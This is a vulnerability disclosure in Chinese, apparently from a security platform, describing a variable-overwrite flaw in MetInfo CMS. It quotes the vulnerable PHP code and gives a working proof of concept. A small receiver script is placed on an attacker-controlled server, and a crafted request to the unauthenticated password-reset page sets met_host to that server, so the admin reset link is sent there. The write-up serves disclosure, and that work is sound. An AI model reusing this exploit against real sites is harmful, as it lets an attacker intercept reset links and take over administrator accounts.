- 发布时间:2016-08-25
- 公开时间:N/A
- 漏洞类型:变量覆盖
- 危害等级:高
- 漏洞编号:xianzhi-2016-08-41454550
- 测试版本:N/A
漏洞详情
config/config.inc.php
$query = "SELECT FROM $metconfig WHERE lang='$lang' or";
$result = $db->query($query);
while($list_config= $db->fetch_array($result)){
$_M[config][$list_config['name']]=$list_config['value'];
if($metinfoadminok)$list_config['value']=str_replace('"', '"', str_replace("'", ''',$list_config['value']));
$settings_arr[]=$list_config;
if($list_config['columnid']){
$settings[$list_config['name'].''.$listconfig['columnid']]=$list_config['value'];
}else{
$settings[$list_config['name']]=$list_config['value'];
}
if($list_config['flashid']){
$list_config['value']=explode('|',$list_config['value']);
$falshval['type']=$list_config['value'][0];
$falshval['x']=$list_config['value'][1];
$falshval['y']=$list_config['value'][2];
$falshval['imgtype']=$list_config['value'][3];
$list_config['mobile_value']=explode('|',$list_config['mobile_value']);
$falshval['wap_type']=$list_config['mobile_value'][0];
$falshval['wap_y']=$list_config['mobile_value'][1];
$met_flasharray[$list_config['flashid']]=$falshval;
}
}
$_M[lang]=$lang;
@extract($settings)
从数据库中取出系统配置信息,然后用extract()函数初始化各个变量
admin/include/common.inc.php
require_once ROOTPATH.'config/config.inc.php';
………………
isset($_REQUEST['GLOBALS']) && exit('Access Error');
unset($_POST['met_webkeys']);
unset($_GET['met_webkeys']);
unset($_POST['metinfo_admin_name']);
unset($_GET['metinfo_admin_name']);
unset($_GET['met_cookie']);
unset($_COOKIE['met_cookie']);
unset($_POST['met_cookie']);
foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
foreach($$_request as $_key => $_value) {
$_key{0} != '' && $$_key = daddslashes($_value,0,0,1);
$_M['form'][$_key]=daddslashes($_value,0,0,1);
}
}
先引用了config.inc.php 然后做了一次伪全局的注册 等于所有被config.inc.php初始化的配置都可以被任意覆盖了
800多个配置项 哪个进了sql 哪个进了关键逻辑 哪个进了命令执行 都不好说
实在是太多了没有一个一个变量跟进去看逻辑 找了个后台不用登录就能访问的文件
admin/admin/getpassword.php 行144
$sendMail=jmailsend($from,$fromname,$to,$title,$body,$usename,$usepassword,$smtp);
if($sendMail==0){
require_once ROOTPATH.'include/export.func.php';
$post=array('to'=>$to,'title'=>$title,'body'=>$body);
$met_file='/passwordmail.php';
$sendMail=curl_post($post,30);
if($sendMail=='nohost')$sendMail=0;
}
当jmailsend失败的时候 就会使用curl_post函数来发送
include/export.func.php
function curl_post($post,$timeout){
global $met_weburl,$met_host,$met_file;
$host=$met_host;
$file=$met_file;
if(get_extension_funcs('curl')&&function_exists('curl_init')&&function_exists('curl_setopt')&&function_exists('curl_exec')&&function_exists('curl_close')){
$curlHandle=curl_init();
curl_setopt($curlHandle,CURLOPT_URL,'http://'.$host.$file);
curl_setopt($curlHandle,CURLOPT_REFERER,$met_weburl);
curl_setopt($curlHandle,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curlHandle,CURLOPT_CONNECTTIMEOUT,$timeout);
curl_setopt($curlHandle,CURLOPT_TIMEOUT,$timeout);
curl_setopt($curlHandle,CURLOPT_POST, 1);
curl_setopt($curlHandle,CURLOPT_POSTFIELDS, $post);
$result=curl_exec($curlHandle);
curl_close($curlHandle);
}
$met_host其实是metinfo的api接口地址 保存在数据库met_config表中
所以 只要修改met_host为可控的地址 就能直接拦下修改密码的验证邮件
证明如下
先写个收信脚本passwordmail.php 丢到自己服务器上web根目录
<?php
file_put_contents('x.txt',$_POST['body']);
然后 发包
Host: www.xxxxx.net.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: recordurl=%2Chttp%253A%252F%252Fwww.xxxxx.net.cn%252F
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
action=next2&abt_type=2&admin_mobile=admin&submit=1&met_host=123.456.789.000
met_host=改成自己的服务器地址
查看自己服务器web跟目录下的x.txt就能找到重置密码的链接
view.png
